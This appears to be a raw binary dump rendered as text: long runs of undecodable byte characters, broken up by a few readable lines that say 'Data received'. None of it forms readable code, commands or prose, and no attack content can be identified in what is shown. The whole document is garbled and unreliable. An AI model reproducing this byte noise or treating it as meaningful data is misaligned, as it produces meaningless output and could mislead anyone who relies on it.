TÛqÿeÏG8+ãµ`²ðZãp{tÿ®í=å~q`$ûÓi?(âëz+ã¿Q¿µµoä8ö<½p'eCã8ã~èm®%:igxl®ì\8+~zÃÛ(ãqgä8+ã8®80V$8+ã8+:¾U+ã8+ã8P8+xeä ~q`$ý¼Êµ?9;Hh§0ä~=VãëèîÜèyP~;Þ´(ã·×³Pªå8½ô½UxNä~q`$þ¼Éµ29;ó{î²Ïúµ_´<Ôèßã8+ÙÏÆ_Ïn¼!.ãt\W0t\W0t\ÜTúïäÜ°+ã8ÛgTÞá°Ãþþ9èìèß²+ã8H8}Ï}«b0²èäø;ÿm+ã8±\xê8R¹Dã8}+ñ-ëä}Yìà8ã´ä7dÆ+0ÔPã=ã8¥ð8ÕðÏö6úÖç¤8R²<"kgCwxÐ±Lôñ8+ããÎÅµtÄ'µä7vxãæ8¯$Ï5¹PÀ3Qg\|ÛvVìà=y÷ä8±PVìà:y9²4yÃ;<PÓ&ã8x×;<P'&ã8\W0t\ÜTúÂïäÜ°+ã8ÛgT(Þá°Ãþþ9èìèß²+ã8±ìü J-x+ã g¹X¨,8+\|ÿy¹\|%k}ÿM¹h¨ 8+\|çYitìV¿Õi±p"%FÝFÑ(ãµÌS9çO·Pc/æ8ì4·%~ÇU®84¼0³ÔG=¤Ò9R¹D+ã8yÅJ;¹x¼)Æk)G+:ø+ã8R¤<+ã8Vëü;+ãqtÿ®$4ìq+ã8®$<Á3ºÁ+f\|m¹D¹\kð³ÔK}kø³Ô3;8+ã8Vëø8+ãqÐã8+®fäôßMSF¼{)Pßêå8ì9çK·µ!Ý.ãµÜ3q<¯®84èøµÔOóáQÍó-Ô_}ÿE¹xìµÜgqïEÙ:ÿm.8(;û(~ø4µäC\|ÿ~¬êÏ0®39Z)PÕøÏúµ_ôHhb0Þ¼ûµ29À/xeä÷÷M'Z®D ä(+(Æà¼PÞ}kà¼i jÀÞ{(ã½U}ÿ~±Lôñ8+ãã
Data received	ÃØ3)(ã½U9ÿm-~ï}R¹h+ã8Vì)+ã~×kä½kÔúheBã8ã~óm®&:hgxl®ì}2+µëyj«;®80Vìà8ã´Äg;ÿy+ã8R¹T+ã8Wì8!ôÊ=±Ó%»k+ó8¹ÈµØ'gz5ö%½Q'g@1z+ãêÀ3+f\|¯Ì±åÐM¹8x2ý8® W%íäPAä8Ô\Pggã8;q÷IR¹D+ã8y/9ÝhVìà2Ô$PwIä8oÀ½éóÊäèt¨`&ãÎùUk<NåµÄ_gB¹ÐµÜk¦µP¨î;+ãÊ½DiÇP®$D#Ã)ý8ÙµPDýå8oü~×'üµÄ7;ÿA+ã8R¹l+ã8Wì$8!ôÊ=±`Ò%»k+ó8¹ÈµØ'gz5ö%½Q'g@1zã+ãêÀ3~+f\|R¹Dã8Ü q×3ä8+:ÿ}ã8m¹`®î+ã÷÷¹é{!ä(+,Ðà¼SÞ{kà¼i ò±ã8ÃØ'(ã½Ugeä;ùKqÿ0V0+fT0Ð=ñº8yc 8±yk/9·ÜC;ÿmã833RµAm¹D±xx{8®8$£È(ã)~8Át¨tµI®ï8ç/Õe}-#U«;Ü½kÔ$úheBã8ã~óm®&:hgxl®ì0+µëy©;®80Wìà5Üq×[ä8+:ÿEã8m¹x®î+ã÷÷Ié{!ä(+,Ðà¼SÞ{kà¼i ò±8ã8ÃØï$(ã½U:ÿmã8Vì8+ãq×7ó8+9ÿI+fB¹ÐµÜs¦µP¨î;+ãÊ½DiÇP®$D#Ã)Gû8ÙµPüå8oü¼J¿ðÒ³·Ô+Ç+ã½}~tøÇÑþ3g`+p÷¹3nHÔq×'ð8+¢xãá[:ÿmp÷Q3oX+f\|®l,¹æµÛt¨t¨CgE¼ø J6úx}/c]l!ôÊ=±xÒ%»k+ó8¹ÈµØ'gz5ö%½Q'g@1zý+ãêÀ3+f\|m¹DTYì48+ãq×_ó8+9ÿQ+fB¹ÐµÜC¦µP¨î;+ãÊ½DiÇP®$D#Ã) ú8ÙµP0ÿå8oüq×'ã8ïR¹P+ã8Vì)+ã~×Cä½kÔ\úheBã8ã~óm®&:hgxl®ìP>+µëy^×;®80Fh4û(PìäSØ-ã87Ìµ]³ ×+öF+ã·Üsî¨ã´a±`Yìà)+ãP÷3ã8Æ4~×'ó·ÜkþN+ã½UfÀ:+³¨t¨½ji<#F>Q6ø¸r(~ïE®î+ã÷÷Qé{!ä(+,Ðà¼SÞ{kà¼i ò±-ã8ÃØ"(ã½U9ÿm~ï}R¹h+ã8Vì)+ã~×kä½kÔúheBã8ã~óm®&:hgxl®ì=?+µëy6Ö;®80Vìà8ã´Äg;ÿy+ã8R¹T+ã8Wì8!ôÊ=±Ó%»k+ó8¹ÈµØ'gz5ö%½Q'g@1zÄ+ãêÀ3B +f\|¯Ì±åÐ}¹8xø8® W=íäP]ä8Ô\P3cã8;q÷IR¹D+ã8yû9ÝhVìàÔ$PEä8oÀ½éóÊäèt¨`&ãÎùUk<NåµÄ_gB¹ÐµÜk¦µP¨î;+ãÊ½DiÇP®$D#Ã)Nø8ÙµPùå8oü~×'ôµÄ7;ÿA+ã8R¹l+ã8Wì$8!ôÊ=±`Ò%»k+ó8¹ÈµØ'gz5ö%½Q'g@1z£+ãêÀ3+f\|R¹Dã8Ü q×3ä8+:ÿ}ã8m¹`®î+ã÷÷¹é{!ä(+,Ðà¼SÞ{kà¼i ò±Ý/ã8ÃØÓ (ã½Ugeä;ù;qÿ0=+fT0ÐMõº8yO8±y79·ÜC;ÿmã83ï^µAm¹D±xxG8®8$£È(ã)~8Át¨tµI®ï8ç/Õe}-#U«;Ü½kÔ$úheBã8ã~óm®&:hgxl®ìW=+µëyVÔ;®80Wìà-Üq×[ä8+:ÿEã8m¹x®î+ã÷÷Ié{!ä(+,Ðà¼SÞ{kà¼i ò±ø.ã8ÃØ»!(ã½U:ÿmã8Vì8+ãq×7ó8+9ÿI+fB¹ÐµÜs¦µP¨î;+ãÊ½DiÇP®$D#Ã)æ8ÙµP$ûå8oü¼J¿ðÒ³ ¶Ô++ã½}~tø¿Ôþ3Sm+p÷¹3+nHÔq×'È8+~tãá[:ÿmp÷Q3[e+f\|®l,¹æµÛt¨t¨CgE¼ø J6úx}/c]l!ôÊ=±xÒ%»k+ó8¹ÈµØ'gz5ö%½Q'g@1z½+ãêÀ3J +f\|m¹DTYì48+ãq×_ó8+9ÿQ+fB¹ÐµÜC¦µP¨î;+ãÊ½DiÇP®$D#Ã)àæ8ÙµPÜúå8oüq×'ã8ïR¹P+ã8Vì)+ã~×Cä½kÔ\úheBã8ã~óm®&:hgxl®ì;+µëyÒ;®80Fh4û)øìäSä(ã87Ìµ]³°×+ÂC+ã·Üsº¥ã´a±`Yìà!+ãPNã8Æ4~×'Ë·ÜkÊK+ã½UfÀ:+³¨t¨½ji<#F>Q6ø¸r(~ïE®î+ã÷÷Qé{!ä(+,Ðà¼SÞ{kà¼i ò±Â(ã8ÃØÛ?(ã½U9ÿm~ï}R¹h+ã8Vì)+ã~×kä½kÔúheBã8ã~óm®&:hgxl®ìý;+µëyÑ;®80Vìà8ã´Äg;ÿy+ã8R¹T+ã8Wì8!ôÊ=±Ó%»k+ó8¹ÈµØ'gz5ö%½Q'g@1z+ãêÀ3>+f\|¯Ì±æÐÕ¹8zéºEã¼i(y£9®ì=åòÖEã¼i'yÏ9®ìåâE*ã¼i3û(tìäU±æÐÙ¹8VÒô8+ãµ
Data received	_ôµV;ó{Öh1-~vÛø~×'ä¿g¿ÃµV;ó{Ö/h.-~v~q`$þ¼ûµ29À/~=¾ø³Ô{ÿuçµÔG;ÿY+ã8R¹t+ã8¼(³Ò/xNä ~q`$þ¼Êµ29;Hhº0ä~>Uãë®aXg++ãµÒ/Ös%=}÷Ailkh6~HÔ4³ä_9Ð~=ì Qxööÿy¹Xì³ÔO}ÿ}¬êÏ%³ÔK}ÿy:³ÔO}ÿ};ãñ±h~×'çP9Ëä8oøµItú¿8Â3Çw+f\|RçT ìä·Ò:ý(ã8Rç@ ìäqÕæ8+³PÄÐä8oø·Òÿ:Á3~ê+~ÿu®80Wî8Vî8+ãqçtÿR§Ô+ã8Vî8+ã¿Q¿ñµÄK}íý§Èa¤0ìíÓ¼³É×Â«%ã´ÜOysä~q`$û¼ùµ´<=h(R)PíüÏúµ_´<¼ô¿g¿ÂµV;ó{Ö/h/-~v)P¥üéä~>Uãë±Lôñ8+ããÎÅµÜ;×wxì8çSãt\W0t\W0t\W0t\ÜTú* ¿ïäÜ°+ã8ÛgTÈ×+ÖìîÆÛqÿeÏG8+ãµh»ÈÂ$ XÍó-Ô3×NÔ³ä7yxä~è<Yh,¾;i) ®zäÍhkiWÔµä7;ÿm+ã8¬=Ìõ·Ð³Ò±äÒ¶<=hZã´V;ó{Ö/h/-~v)P¥üéä~>Uãë±Lôñ8+ããÎÅ÷aþ1PâÁä8L}Úµæ»}÷yiT}0t\W0t\W0t\W0t\½Pó¼@Öä8(âÛý¿X¿úµ±å9n0t\ÜTúXïäÜ°+ã8Û¹8"l´·Ô?+ã8øyNäq×'ä8+?Ó+ãÒÝßñ+ã½U~÷eÏ}7+ã8ÈÅ_Ïn0t\W0t\W0t\W0t\å}\W0t\W0t\W0t\ÜTúxïäÜ°+ã8ÛE,1íä TÛqÿeÏG8+ã9#3lè+f\|¬$Ï±Lôñ8+ããL}À3éô+?t\W0t\W0t\ÜTúxïäÜ°+ã8ÛE,1íä TÛqÿeÏG8+ã¸è/ãÌÕP2Ûä8oø¿Q¼óµÜ?³+ã8À_Ïn´P±Öä8]W0t\ÜTìüî8´³mº<3;é+f\|¬$Ïmº<:æÌiø8Á3õ+?t\ÝKÕÈ½h-p4Ü)ã8¨í;+ãÊ´DhÇS®$D#ÃÁ0&ëÁ3ÒÙ+f\|þ$qÖã8+:þã8Í}>Ïn d(ãt\W0t\W0t\W0t\ÜT7ðî8µì~þ¹@-Ró±ø(ã8Â,ÄèNgã+ã)ä83nã¸:Sz=ììPeõ+ãµ^®=)Qj1i}ÿm6ÄµRXAæÎcã8ª}ÿm6ð=Ræ<)ÓS}÷m% X®$;%AK;»h+ó8¹Û·Ð®{å;+³PyÆä8oø¿Qg^+ã·Éf]p§D}xsä´PYÆä8oøµI6æ J¹DíÈµÔ#¤³ïfÇe³ÊØ¢áÂ3Ó}+~÷e®84Ð¨í;+ãÊDhÇk»D#Ã)ä8îêÆ3êæ+~ÿi®80\|þÆæLz+íy3&;¹@oð³º(ÊÊµtÄ&<®ã+âégE¹¡µ/ë´áÇ3#z+~ö®84Ð¨í;+ãÊDhÇk»D#ÃÁ îêÆ3~ç+f\|Rº,+ã8ÊÊµtÄ&<3mM+Â+ãPvâ8\W0t\®m,¹çµn{UW0t\ÜTÅ0Æí´Æ~zÚôPæÁ>ø#ÒôµV®î+ã)~1Ç¨0e¹4ÂÛP»Rå8oð~ãµVÅåÌiü8n¼ð~×ãµ^ÞãÎÞÎ+ãÙÊÄ&0ÝKÕÈ½h-¤»h+ó8¹öµÁ'g{5ö&½Q'g@1¢ÃµSØ´PTÇä8oüqÖã8+:þã8mú8Ïnc(ãt\W0t\ÜTÜüî8rÉRº(+ã8 åqÖò8+9>åûkiC=ZµêUv+ãÙmçS/ãt\W0t\ÜTÃÞµ`ÂÇRº(+ã8VíÈ8+ã½îóµÖ\|ÿm¹æµ.®ì+âò(fó8+)-\|þ:³ÏåLz+~`¨ã8®?)CóñI§;,+ó8¹Ã·Ù®pæÛµPåÀä8oø¿Q¿¼·Ùf[p¥D}xxä³PÉÀä8oøµY6æ X¹DÐòèÆØvP(ãµÔ'g\|º(m}æÊåLz+z»%ãS¹8å8]W0t\W0t\W0t\ÜTÆ¸ï¼äqksÿ¿ö½ï»äÏº,Á3Éù+f\|ºüÁ3Ñú+pþÛåÚ+ã·×³P¨áä8oðN×äÌ±`îyî8®80mçS/ãt\W0t\ÜTúx¾ïäÜ°+ã8ÛµîÆÈ×+ÖÀ¹Lôä8+~KYìà;+ãµ××;>Ý¹8khÕ¼èyW(F²ôSãKh¥<Ù¼ùµ´<Ví°8+ãµ'ä8"`+ã¿X¿Éµæ3)kóQÛãíR»+ã8U>®%ãA×äÌ³ä;+PÁä8oüµW±Lôñ8+ããÎÅ_Ïiø8]W0t\W0t\W0t\ÜTÆµß»ysäfp;ó{Óh?(âëºV-ë%Ô+³PÖÑä8íðèy-¤8®80V-"Ô+éþ(5û¿P8Áä8oüµWÅz+?t\W0t\W0t\ÜTú@¾ïäÜ°+ã8ÛgTÈ×+ÖìîÁ¹Lôä8+~KíÈq×'ä8+òáQÍó-Ô3´³Ô3:ÿ}+Û+ã½U/xx¬}8+9ÿ}(pÿÛqÿqÛë)+ã½U9ÿm)cÆä+hËÔ·×´èyò¬8ú·Ü3g\|i(À29ÀpÿqÛg(+ã½U/9ÿm.cÇ}+)n¼PBÐä8oø¿Q¼¥·Ô³P¨ãä8oøµÜ?³+ã8ÀµÜ;×wxP¶8çSãèyý¹8aç8+p÷I3S~n´Pèä8Á3Áÿ+?t\ÜTÆi0Æíºoã8Ñ¢{v)dFã8ãúqþ2æ:Î
Data received	Ô'ÿmð£aT+ìì´Ô#¯ÿmxµ+ãÒo³0É;ó«a(¿kît¨÷xh¨ëí¸ÆËb0Æt¨tát¨óQæºüïÓþ5`ä8¸(ã82h¯{äÿ×jÕ¼ú"k) xxç¨t¨jÕÈ³×ÐØ¦8y¯é86ûît¨T;z)ÕxñÅsRãµ@æ¿Q¼å}Æ<mi? ãU²<èüµ²<ÑøµWÅ'µ@æ¿Q¼å}ÆÔW¼ù½3+5\|ûöµþµWÅ'ÒctÕ+Ð÷ã´hk<Ugã´^3!9@Ìà;U]ã´V3ÏÞn'ï7·µHÝ·ªÿå83P¼®ã8¼ü½ïåÏÝqµ!(ã8yùá8®43P¶¯ã8ñÅçS/ãï7ÿ®%Øû(âË ÛoãæS/ãî8S+ã½÷ãäæRÜT7ÀµÔ\|÷e¬$)kä8®a4¾þÐÕ¸8x\|ä8Þ JÂ}çiø Ä³Ô'8ûv;:Ô+~÷m* 9ç'43Ø+xxçìçm®TR¹HÑ.¥8ÔPè½ã8kiLxä9¹L£ÄµÔµ_ÉpìäµZ ízPËä8kh{Äì»©wä8+4T8+³P·ä8kh1SÇ+ãµÔ¦µÜ?}çiæ4©9æÊP&0³#Ô+p÷y3XônÌtìä·Ô3´P£mä8]Þá 8+c·å8Þ¬+ãµaÀnË¨9cHx÷W¿öµY4»pã8;óæ&Ï;ã°(ã8ÎÅ}Çî¼üáeø=+ãÌ;ã6ÝÆº8®³þÂt¨t¨÷®ì+âát¨3û(~vx 9ÊçR"ùì1íä8+cÌ©øÊíäPåã8Ën×xUÝq(ã8xjäpò&HxòS¼Å' QÅ'ï7ánü¤å×+~Cxá~9ã=h.U÷}ãV¼ÿµ_3v-+~@}-~y +ã8âÎi0ûv;:Ô+~i]æÌiü8ÄîÆ©øÊíäµh3³nHË¬êÏ2Pl6ã8-Ri3Uû+ãU{+ãÙÏ<çxÒ8ÜTÆ½ïäÏ¹0n{,8+Exã²£å8Åz+µ}®(Çi0Æa4-xqäfßi+:ÿm(æú±HxÞh9ú¿V¼ÙÏP'ï7gTÂÇËµS¸4ìðÌ®@R¹D.¥8ÔP0¿ã8~r5ÔðÜhTisUÜTÃÝ=7ô·Ô~KW´Púã8n¼üµ_3ù8+sRãï7gTÞµ`þP5ã8n¼À·Ô\|çe®(W´P&ã8ìè´_ÛÏsã¿Q¿ÈµÜ#·9çâÎe3è+\|çe~åPyã8Ï'åXiÌ8û/+z©ïäPÉã8«Ëþ±Hx 9®D®ÑðÊíä;äìÝ+ãùÆº8z;S3Dãát¨yxç7;?ñÆº8+ã8y9nµ}®4ÂÝKÉþã²ä?}Çmàbï¶þ1ÀFhàÌì;¦l8ïÕÏi§Ç<P~Yã8ìì¾Q¿ÞµÙ³k=Ûµì#}ðá¤ÔSßéå»Ììð;ö5µÔä0ìô;íqý)æÀíeÏeaDÙaD-¥ÐÄz+ã J4oå8z\|+ãµkå8<Så8zp+ãµÔä(:Xÿ(ûµÔä((ü;+aÉ<8+¶µY3j@hôÚüµ@ö(Òð³Þ~p=ÚÈ³Ö~ÿ(ó@¹0~iìô;3Hxxç8nâq¶Y+ã8Æ3@$Æ3ªænãÒzp+ãä8§KÙÏÆ=z+µ}Ø·ánü¤å×+~Cxz9~×åãFh+¦°8ä~uVìã;yÛ9ûî»¼µ_Épìäµ^* ¿Q¼ýµ^3iM#æÏs +ã½(+h?"k¤±+¬+ãµ<µA¨9#HxòS¼nãZ´Pã"ã8¤ã;Ï¼ûµZ3ÝnåXnµ}®$"k·îÆí¶Oå8àç)=ä8Û\|ÿn¹Fx{9þê¾Q¿ÓèZ1aãµÄþhÜã¦cå8¥ØÒ3P3(ã8ki,Ç3PïNã8}T~ïn{å°Ô%>ÜãµÔ%(ã8ägxçÆ©(ã8îÞ5hëc`$=hó¯Q¯$ÏÔà+ +ãÌç¯6Ïã3PLã8úfT0µáÖxì³Ô3}ÿ}¹Hìèyç8Ýixuà8¯$Ï/þ$ø.;Z¶+ãµa3«¼nß±A(ã8Ußp-mÏx5hdÇo+5¨?å8æ%Í%èZ\FãØÏÆ=}ÇµÜYnãæSãï7÷34Fz+µ}ØµîÆa0Z;yóä8PC®ã8=4;+~i-m2:;P]ã8},¡oãØÏP&0ÜT¨t;+~³](ã8h<"kÄ:hg@ô¾ðÒþ6ãf8gx6=(ã8â$P®$)zÝ¡à+ãÍ±ù CÀëJk UÕä?+2P3æ?¥+ã8zùUã8m6û.ÖjË"?:)ã8z +ãÍ±ç CÀëJm1@3ù01+ãæz¹0Ìiø8Ä½}ë·µþ¬ÌÆÝÒ/¹zú+³P{lä8oðq×7ä8+!lìä·ìCuúëÞì$²Ô{ÿU¹4ì9µÔX´}ÿe¹xÀ©¤Êíä9'þ3ûñ+æÊP'ï7÷áñ¬ÊíäÁ tå×+[;åâÎØãÎ39g\|Ä&4ÜTÆáe¸;+~ixz9¹0´;+¬(å~vx93PÝã8ñÅz+µ`3¶fxxç~vx¸9¯$Ï®"\+ã8ï,:ÉÅ' QÅ' Që}ÇµÔµ`®ì8ç:¾Å(ã8+ã8yk9zà+ãUzì+ãµßå8æzà+ãÌzà+ãUþ$æÌiø8ÇPBã8S¯¶É(ã8æ/ÖxÎn¾Å(ã8(;+h<h:"k}¶É(ã8Ïnµ}«a0Þá@hâ~H;+"8+£µ
Data received	ckÔ=h+U½nãÕÝ£ÕãâÈk MàÏ®â7åPxâ8úPìïã8oðµÞxsäfC¿ùP·á8Fi Ú PøØã8Ôèßã8+ÙÏÆ=}ÔP7ã8øOÿ¹PÀ3+?ï7µ`j<V-Ë%Ô+·ñãA×äãå4Ç3öünãmçS/ãï7µ`3¥lêþ(2û¿P`îã8ËÀ~ÎÄ&<ÜTÆP&ã8ìðèìüèd8+BãÙÌiü8ÄëÇÂq+ã8û+pÿ3èy89¬$Ì0z)ÖN=h ílkxsåÌ8ºÜZ}ÿm¹Dú+³PÞ<ã8UÕoãÓ+ã8Ç3ýnã"=µWÅ=z+µ`ºki0y'9ºë¤æRÜT7ðíÇÂKxî'9ÔU}ÿmLxdù8¯$ÌþãTºÜ£³ì#yeäcÅ+(n¼à´_38+9ý+Ëx8+xxî²Çm®ì=çâô§0Öøµ¾+ã8z/~ô·¼ëZ}¾+ã8yï8<¿X¿Ó½h(ª°8@8+?nëðU¤ÔÈü8À2PÅ,ã8x8+xxÇi0Fi/¥ô8î~vx&ø8¯$Ï¬ãÏ²ÜÆ±äP÷(ã8Æ2P.ã8UU+ã¼Q¿ø Q6úµ×ÏøùæìÏìT©®Z¼+ã8Äè¾J¿ø½ò/ã¸ìãÏÂvxù8ÊåXiø8ÄëÀ®D¹@øNúÛ}÷i±0ù×Kú3TCgÇm+i$y"%9«lô\|¤+ãµÔ'h?èðU(¤ÔXiø8û/+;ïäP¹ïã88ñã´I?PÆ%ã8-ÅðÏæz¸+ãÏ:UÞ?P?ã8kh?(»Ì/ÝuxVá8¬$Ï#³t8+8.ãâì naDkh4û(µY3¤E@Ôà8Vîy¿á8;Pïã8UÝK¥ð8äÎã²×~vx{l8¯$Ì#º<Õð{p/$@¬$ÀÛÞãÕ6úHèlÒÃ´µ_3©À+~öÝ[~ãÙRÜTÃÝµ`3Æ9;U@x²ù8¯$ÌÃ3Pâ.ã8ki+%h7¤üµ_Â°+ãU=Þqæ)¯½n(ùÌ=±çã"k) ®qç2Ç2ÒÂ9+ãån¼ðµ_Â+ãÙÏP&0º<Õð{p/$@Û}÷m3#Wg9¼þ9ç'vxÚâ8±øà.§Äî¼ðUi0U4+ãµç³yNç:çSãï7gTÞáè¬³Ü'"F<ìè´BÊ~=nh63åÌö;Ï±ýâz=Ë¬6Ì÷±Lm) ~÷m4G¿øµc63°Ì#gF¿ù½o,h èøµ4Q%Xhì?Á@ÜP4ã8Ôà¼o,h5n¼P´$ã8Ôà8ç#ãÎ3ô8+geä,~ÿe¬ÙÏÆ=z+0©/ü3iúnKÅÀ·Ò/\|ç}<³Ô;Îã¼ô'ä¸ìãÏ®b¥óµ¬ãÎ#²4Ç3¢W
Data received	>ó¹ÞfS0"%XãÎL"%DãÏ®<5øµû½x/êzlã8ç6ysäfI®;-{10åÏ`¸Å}}.?t\:½qxx¬8+~kHc{zÞØ8+ãµnÍóÉÍóÉß)þÝÄÞº÷b1÷béÍó¹Æ)îÊÔÞºø÷ÖÁÍóÉçË)þ¥Þªø÷bÉÁÍó¹æË)îª·§«ä8#¸+ãòäysäÊkS1ù¿C¿Å·+ã8>óÉ>óÉß)î)îÚô·çp¹1Ñi_HÃÌ!%{{))\|!Rø½W/fS¼µY®=å}>¹ñØ¼ë¶µã8+pó¸Å}Ø8+ãµnaô8+Þh=QµµS<½p.3{!×Ò½Ïfh:å~.pÎc<Ù¼ãx0â83ô.+gxç.ÕxU3ß0+gxç+ãU{å}Ç¸ìãÏ3¦0++ãÄ't\W0t\ÜTÆi0Æa4-f@n¿ñµß/æi%«PBâ8íüµßæi%«ÙÏÄy%ãw\W0t\W0t\W0t\ÜT7ÀíÄüîÆm¹9×q×?å8+Ç.(ã³4îü·âÖ?¹8ÇÛ}Ïa¹@x¯ã8i(y#È8¹0oôµêéûÍiâìµÔ\|ÿy¹\îà¼n%hÓÔì¶Ö)p<ÖÀ»/dµÙ/\|ÿ}¬=Ì Pã8 ({÷n¬$Àª¼U±9&gEn¼=¼X¿ÒU0R¹L+ã8zf9n¿ÂÐ¹8Çaâ8uxÊ8ÝãÎi3Fg\|¹LñÅµtÄ'µÔdò¾XçãgA¸8¿ÓÐA¸8y#«;®8<kh%ü4Ô+~vú(âÎÉpìä9FiHoüµÔ~÷4Pã8ìðéùÃþÝaS+ãµÔ9ç#}à3F÷}®80]ó3?/+?ï7ÿ±4hi<"k}hù½Q,}(+h YhTÛåÀ(h4kæ½P)gjçO` kgpÄ'Pz,ã8S×xPh>(èÌ)k'ï79ç~Kxÿ DRúH5ìäµWÅz+µ}ÝãÎP@à8Y-Ô+~~ÎÄ&<ÜTÆi08FH'ãpOÇÿ:æÌiø8Ä½}~ÿ®=9Åþ³Ü'µÑ~mÉL&}ïi4ëü³ä7}ÿa¬$)ä8¨Rß{-ijn¼Ì9&3÷=+ãkhìè¾Q¼ºµ×/~f¤à²Ô#ãÎªPc)ã8ÈÀxxäpþÛãÎ3/:+ãìÈÏ¬Ï5iLÙæaHåï÷m@¼U=º,¼×NÐäÏ<:U=¹D=#¯Çi¢ÚNÕ£Ï¬$Ï9=º,6ñµÒ~øøgëÈ;åÖxñÅsU=§,¼NÖäÏ\|'U}ÜTÃØÿ(ÂÝøÂà¼0"k}çm¬=Ì¨½ÑàÊÌ+æ%Êeþ$¿X¿½·ë~,ë²Ä#iü²áÂÏ/¯Ì;+ÅåÏ#®&:mæ¼J¼ C6ÝP¾Éµì~,=¦,¼ý+¿ðøhV%kæÊP'µW6ë$C®>;Ñ¬6ÌD-h¦zI¯{åEÇmÈ±géÈ<äYÏö½WfzÎ¼Î¼J¿ö²Ë(æ¼ò½S)f~¯Ïuþ6U5½[(xjä£P¹"U¹@}µ}®ìð½X·îÆ¤("}Çi³ìO}Çe4ëü³äG}ÿqaTÔ~×å³Ü3yx¯À;+~'Pæ¹TæâÎ ªP#(ã8ÈÀxxäéñ.h=¼µ×/\|ÏeHì9çâyä8À¼Qg§+ã·×³9çj+ããÈæ¹,¬z8+}ïn?Ü;¯÷}z¡+ã¼C¿hµÔ?êûëÿa¼Ï¿Q¼ô²×Ç;gCÎxf[ÆhÜã´ä?U;z ~Ïeº ëðµø<{{)Ç;gXd[="Q=4A9YhPhíüèn¼üPÃ+ã8ÈÀy9ä,¬ÿy¼£µo¹PÜã´Ô#÷aîÏMæX©ü9xjäx9ä~q}éñ,hem}ÿi6¿Q¿ûµÔOyxç)ÖxñÅsUÜTÆi4"Yî§óµÇ/~ÿð:íü=(~>içRÜTìüµÄ®zäþgz®$0ÂÌ XáÎÏ¯Ì;+ÁåÏ®$:iæ¼J¼µP6ù%Q®<;Ê¬$Ïxå²PÄ'ï7ÿ±4Ëø8Ëü8Óøq;ÇÿÄ'ï7ÿ±4Ëø8Ëü8ÓøqCÇÿÄ'Ò³ÜC×+â%ã´ÄxjçÖxÔÜã8+ÙÏÆ=}Ìà;)~Àmæ/~é&P" %Xû`»(ëø9ç[;äâÎÂmã¼U&:ÜðGÙãÎÂ¼ûP¤&ã8},½lã¼Uxxç¬ÿ ¼´q×'â8¾küèÇ3;Fãm;ÿm%ã809ÿ}ä X¨¬?+#)h{UPø#Çÿ¹dÀ3á9ãùïíþ6ÉÐ ¸8ìèy)â8ÀÐ ¹8ìèy#9Wµ}¹0kh6,/þ¿ûèyª 8Àz+3+ã¿Qg-+ã}ät×+âÎþ$}ÅÂt¨t¨nüt×+~@xQõ8ã&ãÏ¬ÏÈ±ã8'Äþ3++ãki<"FúÇ±ÜÒ3_+~HËÀyNä9'Äþ38++ãki"F·9'Äþ3T++ãz/~f%=Pxæä8ÈÅ¨t¨Ê}Íng¹8n¼ç Qnát¨ã¹8;+ããÇì«t¨»;fCÏx5RæR³ñéÒ++ã¹8È®ì8ç.ÕxU³øä×+³Pã8ÈÀyxç?+ãUw{å}³Äþ®ì8ä³P´ã8s×+ââ¡(&Ò³dB×+%ãJ¹(Óø¿Xg2+ãÈò¼(ã8Ûü¿C¼ü pJ+ãµi4Pl?mð=cD¤È¼X ÄN%°+þ¹\kh)Sã.Y)¸8nÜµY6ÿµÔéz¿ÀµÙxs¯-8+xN¯U8+\|6ÒüèÀ6«N(£Ì8¯M8+xN¯u8
Data received	aX³Ä?gS¼½ì'äg×;h:HKÿDÌUþãfHÒy9ñ¿üÒ3Ö[½w$ê\|¿õN×ÃÌ±ÄPHã8Ë®I%kyNÎwxÍP'µnÜTú+âÎ i n¼È9çâÎi0y,ã8®8$Ìn9ÇµÔÖsÅþýÓøµÔy+ãxÓüµÔ\|ð±(ghôÌ¹0®ä8Q<ghæÌ¹0®ä8Q®¼<=%;å~ÿju8kgð/éz¿ðµÔ"¶+#½Ù/ûNS4ìüy+ãxÓø(Ôüî¼ðµh<f[×û®( èüµÜ~>këk%èü½qÔû±0-4Pi[×û®< èüµÜ~>P3çA@þ¥0KæÐ~>Ôü{x,êk%èüRø¥0yÏ94NR(1Ôü½ØóNR/1ìü½ÙûNR1ìü½ÙçNR1ìü½ÙåNR>ìü3É~>¨+ÿ8$Ì$ää<+,+û8¿ðP¼ÝµÔf06ÅµÜ~;Kâ¼Y)\|;z~÷å½q$ÿ}};ÿ®ÄD-,8+ãP¿Ä)ã8å®{ç ~ÿ®Ä]}~÷å½q2gp6ÿµÜ~;K½Y\|;ìüµÜ$[þü»pKã:øüµÔüà1®a¿ÐµÔfØ1Hÿ @äµÔà¹0ÃµÔ~ç ®Øp¹0H.àÁ6®µÜ~û1®]Sæ³Ð~ÿ DäµÔà¹0ÃµÜ~ç ¥ØK½Y)\|ûñ¹0L.àÁ3fqÿÛ;û+¨t¨±0èü¿ú½7%ûsüÌ®ÚEèü¿ú½7"ûsæÌ®ÚIèü¿ç½7J;«9®=3äÌ$®;å fP¿ñ½y(hã4+-Ø9mã6ã8-(-Ø9iã6/ã8z5Å.($P®13äÌ®;åfP¼Î6Êµ%7)ã8z~>2iñ8+ã³®aÅh1Hè´c 6ùgÓÛ%ÎÆ}µ}¹0#åÌ®$F#åÁ 3A:n;83+ã8Ìn¨ãpã8Ä'µnÜTÜð½}Ösh,T«jÿ¿üø#ÁÄ`6ûµlxÎÔ+\|÷u¬=ÌÄ¹(ìµÔ\|ÿ}¹ ìµÔµä\|ÿe¹ùã;iìì´Ô\|Ïq¹Dxü9¹XÀ3=ng\|¬$ÏÝïnãâLììÙXn9+ã9çó5Lã8çnãf×f\|P'µnÜTÅÝ.ø+ã gÂÇ;S¾xöæ%Ïfä4+#÷®ìûä.8+ãUfä<+S¿æµO;Ëä82hh,+Ã8¿Íëä8å®{ç!8+ãUeä:+?¯+ä8þ=µFè%R4µVh12h%Zh<[qS3ýPh=[qS3þP3{p)$S%½p($I.<½v(þ{R5WÅÿ}ÍÄ'µnÜTÃÞçaä(+áb'µiD5!pS2æ)ã8û+»p+æ8¿ý[¿ð³ä'1Vìà;1+ãã82hh,+ç8¿Êã8å®{ç!8+ãUUeä;+Ös^¥kz'@h:2h%Zh=[}S3çPh:[}S3øP)uk%U%½p($[®;hÿ}R5W¸DÎÆ=}µ}±0h·î8%P¨9ê$5acä4+Yh."eC/ã8ådCã8å®pä/~Y}.8+ãU±¤åz,.ø+ãµW`ä=+Æ{ä 8+ãÌää:+5hi-®+86ðyëä8z,"81+ã X 